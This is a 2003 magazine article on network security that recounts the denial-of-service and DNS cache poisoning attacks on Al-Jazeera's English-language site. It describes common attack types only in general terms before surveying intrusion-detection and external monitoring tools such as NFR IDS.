Stemming the tide
Intrusion-detection and monitoring tools can help shore up your network
- By Kevin Jonah
- May 15, 2003
The networked world is an increasingly dangerous place. With the possibility of foreign governments or organizations plotting cyberterrorism, there's no end to the number of threats to operations on the LAN, WAN or Internet.
And even if you remove the threat from abroad, there are plenty of domestic hackers who'd like nothing better than to beef up their reputations by making a trophy of your Web site.
Keeping your firewall locked down is no longer enough to prevent an attack on your systems'especially in a world where Web services have become part of doing business with your constituency. And as government Web sites become the virtual equivalent of the institutions they represent, hostile hackers can gain big propaganda value out of knocking out a server or merely cutting it off from the world.
Take what happened to Al-Jazeera, the Arabic-language news network. The broadcaster had opened an English-language site dedicated to providing coverage of the war in Iraq, but the service was knocked offline by hackers.Spam storm
On March 23, shortly after the network broadcast images of dead and captured American soldiers from Iraq's then-official government TV network, a massive denial-of-service attack was launched against all of Al-Jazeera's sites. The attacks overwhelmed its 100-Mbps Internet connection, and when Al-Jazeera doubled its bandwidth, the attack still managed to drown out users.
Later in the week, hackers managed to usurp the Domain Name System listing for the server using a technique known as DNS cache poisoning and redirected traffic to a site with a pro-American message. The hacker site was hidden on a Utah Internet service provider, which then bore the brunt of an antiwar denial-of-service counterattack.
Attacks such as distributed denial-of-service and DNS cache poisoning don't require intrusion into the affected network; they're mounted outside from other systems that have been compromised. Tracking the source of these attacks is difficult at best, and traditional intrusion-detection systems'ones that monitor access to and changes to the systems they protect'might not even alert administrators to a problem, let alone prevent the attack.
To be successful, a cybersecurity strategy has to go beyond simply detecting intruders or monitoring network traffic.
As attacks become more distributed in nature, so must be your defenses. You need to make use of tools such as remote site monitoring and response measurement, network monitoring, and automated network management that take advantage of programmed policies and pattern recognition to launch a response to a developing threat before it takes a network or Web site offline.
System managers need to know of weaknesses in their network configurations and system software.
Hackers generally exploit bugs in software on a system to begin an attack, whether they are bugs on the target systems, or on outside systems that the hacker intends to use as zombies'hijacked systems that launch concerted attacks against other systems at a hacker's bidding.
Attacks often are preceded by a port scan or some other type of probing attack to determine the vulnerability of a system by identifying the operating system or software it runs on. Careful monitoring of network traffic can reveal these probe attacks before they can gain access to vulnerable systems.Buggy arsenal
Once an attacker has an idea of the potential vulnerabilities of a system, he or she can mount a variety of attacks on the system in an attempt to exploit bugs or misconfigurations. Just a few include:
- Creating a buffer overflow by sending more data than the server program is prepared to handle and causing the entry to be stored in memory outside that allocated to the program. The data used in these attacks often includes code that could be executed by the server. This method of attack has been used to exploit documented vulnerabilities in Microsoft Internet Information Services that may have been left unpatched by administrators.
- Cross-site scripting and other unexpected data entry, in which hackers send strings of script or code as the entries in Web forms. The code could be executed either by the server or by the browser of another user, redirecting them to an external site and capturing data such as user names and passwords.
- Attacking default setting systems by using commonly known initial security settings on Windows or other systems to gain access to them as a 'superuser.'
- Blunt-force attacks, using password-guessing software, or other repetitive attacks such as denial-of-service attacks to gain access to or crash a system.
Intrusion-detection software is designed to sniff out incoming probes and attacks such as these and either alert a system administrator or security manager, or take some automated action to defend against the attack'or both.
Typical intrusion-detection systems monitor the log files and file systems of protected computers for unauthorized changes. But in the world of Web applications and services, this approach by itself might no longer be enough to ensure the security of an organization's data or its ability to sustain operations.
New intrusion-detection systems, based on pattern recognition technology and other artificial intelligence software, now monitor the network packets themselves. They watch for signs of an incoming attack and alert administrators before there's a breach of a system that would cause the kinds of changes that a log file and file system scanner would catch.
For example, NFR Security Inc.'s NFR IDS system monitors network traffic and performs network analysis, watching for the signature of an attack or for parameters that might indicate an unknown type of attack. It can generate Simple Network Management Protocol traps and events in other management software packages that trigger preprogrammed measures to be taken; it also can send alerts to an administrator's workstation, and e-mail to designated addresses to warn them.
But even this level of intelligence might not be enough to stop attacks that attempt to deny access to a network rather than breach its defenses in a traditional way. That is why many organizations are pairing IDS systems with external network monitoring'this approach can detect problems that might be caused by a denial-of-service attack faster.
Kevin Jonah, a Maryland network manager, writes about computer technology.